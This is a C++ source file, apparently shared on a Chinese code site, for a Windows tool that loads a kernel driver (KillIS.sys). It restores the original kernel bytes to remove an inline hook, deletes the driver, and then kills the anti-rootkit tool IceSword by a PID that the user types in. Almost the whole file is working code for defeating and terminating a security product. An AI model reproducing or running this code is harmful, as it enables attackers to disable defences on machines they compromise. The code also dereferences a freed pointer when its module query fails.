?? inlinerehook.cpp
字號:
// InlineReHOOK.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "NtQuerySystemInformation.h"
#include "Driver.h"
#include "resource.h"
#include "ObjectKill.h"
#include <stdio.h>
#include <conio.h>
#include <windows.h>
#include <winioctl.h>
//Link Device
#define IOCTL_GETADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x900,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTCODE_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x905,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTADDR_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x910,METHOD_BUFFERED,FILE_ANY_ACCESS)
#define IOCTL_INPUTBYTECOUNT_CONTROL CTL_CODE(FILE_DEVICE_UNKNOWN,0x915,METHOD_BUFFERED,FILE_ANY_ACCESS)
PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount);
void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount);
HANDLE hDevice;
int main(int argc, char* argv[])
{
char DeviceRet[25];
DWORD ReBytes; //驅動數據交換返回值
memset(DeviceRet,0,4);
ULONG NtAddr;
ULONG ByteCount;
ULONG BeginKrnlAddr;
FreeSYS();
hDevice = LoadDriver("C:\\KillIS.sys");
memset(DeviceRet,0,4);
DeviceIoControl(hDevice,IOCTL_GETADDR_CONTROL,0,0,DeviceRet,4,&ReBytes,NULL);
NtAddr = atol(DeviceRet);
BeginKrnlAddr = NtAddr; //得到開始地址
ByteCount = 10; //獲取更改代碼的個數
PatchHighMemory(NtAddr,ByteCount);
UnloadDriver(hDevice);
DeleteFile("C:\\KillIS.sys");
LONG pid;
printf("\n請輸入冰刃的PID值:");
scanf("%ld",&pid);
ObjectKill(pid);
return 0;
}
void PatchHighMemory(LONG NtBeginAddr,LONG KrnlByteCount)
{
//device var
char DeviceRet[25];
DWORD ReBytes; //驅動數據交換返回值
memset(DeviceRet,0,4);
PUCHAR ByteWrite;
PUCHAR Code;
printf("高位內存起始地址:0x%0.8X 數目:0x%0.8X\n",NtBeginAddr,KrnlByteCount);
Code = GetNTOriCode(NtBeginAddr,KrnlByteCount);
if(!Code) exit(0);
ByteWrite = Code; //得到原始代碼地址
printf("開始反補丁");
//輸入要更改的BeginKrnlAddr數據
DeviceIoControl(hDevice,IOCTL_INPUTADDR_CONTROL,&NtBeginAddr,sizeof(ULONG),0,0,&ReBytes,NULL);
//輸入要更改的ByteCount數據
DeviceIoControl(hDevice,IOCTL_INPUTBYTECOUNT_CONTROL,&KrnlByteCount,sizeof(ULONG),0,0,&ReBytes,NULL);
//輸入要更改的Byte數據,并開始更改
DeviceIoControl(hDevice,IOCTL_INPUTCODE_CONTROL,ByteWrite,KrnlByteCount*sizeof(UCHAR),0,0,&ReBytes,NULL);
}
PUCHAR GetNTOriCode(ULONG NTBeginKrnlAddress,ULONG ByteCount)
{
HINSTANCE hNTDll;
ULONG nRet;
ULONG nQuerySize;
ULONG Success;
PSYSMODULELIST pModInfo = NULL;
//獲取NtQuerySystemInformation
hNTDll = LoadLibrary("ntdll");
NtQuerySystemInformation = (NTQUERYSYSTEMINFORMATION)GetProcAddress(hNTDll,"NtQuerySystemInformation");
FreeLibrary(hNTDll);
//獲取內核模塊
Success = NtQuerySystemInformation(SystemModuleInfo,NULL,0,&nQuerySize);
pModInfo = (PSYSMODULELIST)malloc(nQuerySize);
Success = NtQuerySystemInformation(SystemModuleInfo,pModInfo,nQuerySize,&nRet);
if( Success < 0 )
{
free( pModInfo );
pModInfo = NULL;
}
if( NTBeginKrnlAddress >= (ULONG)pModInfo->smi->Size+(ULONG)pModInfo->smi->Base )
return 0;
HMODULE hKernel;
PUCHAR buf;
buf = (PUCHAR)malloc(ByteCount);
ULONG FileOffset = NTBeginKrnlAddress-(ULONG)(pModInfo->smi->Base);
hKernel = LoadLibraryEx(pModInfo->smi->ImageName+pModInfo->smi->ModuleNameOffset,0,DONT_RESOLVE_DLL_REFERENCES);
for(int c=0;c<ByteCount;c++) //拷貝數據
memcpy(buf+c,(PUCHAR)((ULONG)hKernel+FileOffset+c),sizeof(UCHAR));
return buf; //返回指針
}
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -